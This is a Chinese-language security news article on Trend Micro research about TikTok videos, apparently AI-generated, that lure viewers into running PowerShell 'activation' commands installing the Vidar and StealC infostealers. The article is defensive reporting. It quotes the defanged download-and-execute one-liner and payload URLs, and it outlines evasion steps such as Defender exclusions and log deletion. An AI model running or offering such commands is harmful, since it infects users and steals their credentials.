AI生成恶意软件：TikTok视频通过PowerShell命令传播信息窃取程序

导致Vidar和StealC恶意软件的感染链条 | 图片来源：Trend Micro

趋势科技（Trend Micro）最新研究揭露，TikTok平台正出现一种新型威胁：AI生成的视频诱骗用户执行恶意PowerShell命令，使其暴露在强大的信息窃取恶意软件风险之下。

社交工程攻击新手法

趋势科技近期曝光了一起危险的社交工程攻击活动，黑客利用TikTok的病毒式传播平台分发Vidar和StealC——两种复杂的信息窃取恶意软件家族。网络犯罪分子通过AI生成内容和利用用户信任，将看似无害的视频教程转变为恶意软件传播载体。

报告指出："这类攻击使用视频（可能由AI生成）诱导用户执行PowerShell命令，这些命令被伪装成软件激活步骤。"

攻击传播机制

攻击始于@gitallowed、@zane.houghton和@sysglow.wow等TikTok账号分享的匿名教程视频，指导观众激活Windows、Spotify或CapCut等软件。部分视频播放量超过50万次，展示的"激活"步骤最终会引导用户执行如下PowerShell命令：

iex (irm hxxps://allaivo[.]me/spotify)

趋势科技强调："视频指示观众运行一系列命令...指导语音也疑似AI生成，进一步表明攻击者使用AI工具制作这些视频。"

该命令会下载并执行远程脚本，启动一个兼具隐蔽性和持久性的恶意软件投放链。

攻击流程详解

用户观看TikTok视频后直接执行PowerShell命令

从hxxps://allaivo[.]me/spotify下载并运行远程脚本

在APPDATA和LOCALAPPDATA创建隐藏目录，并添加到Windows Defender排除列表

下载二级有效载荷——通常是从hxxps://amssh[.]co/file.exe获取的Vidar或StealC

从hxxps://amssh[.]co/script.ps1获取最终持久化脚本，使恶意软件能在系统重启后继续运行

删除日志和临时文件夹以掩盖取证证据

趋势科技警告称："脚本采用重试逻辑确保有效载荷成功下载，然后以隐藏的提升权限进程启动恶意软件可执行文件。"

新型C&C通信技术

恶意软件激活后，会使用新型规避技术与命令控制（C&C）服务器通信：

Vidar利用Steam和Telegram等平台作为Dead Drop Resolvers（DDR，死投解析器），将真实服务器地址隐藏在个人资料元数据中

StealC直接连接基于IP的终端（如91[.]92[.]46[.]70）

研究人员指出："Vidar尤其滥用Steam和Telegram等合法服务作为死投解析器。"

AI驱动的恶意软件新时代

TikTok算法放大效应与AI生成欺骗手段的结合，标志着恶意软件传播进入新时代。正如趋势科技强调："AI生成内容的使用，使这类攻击从孤立事件升级为高度可扩展的运营活动。"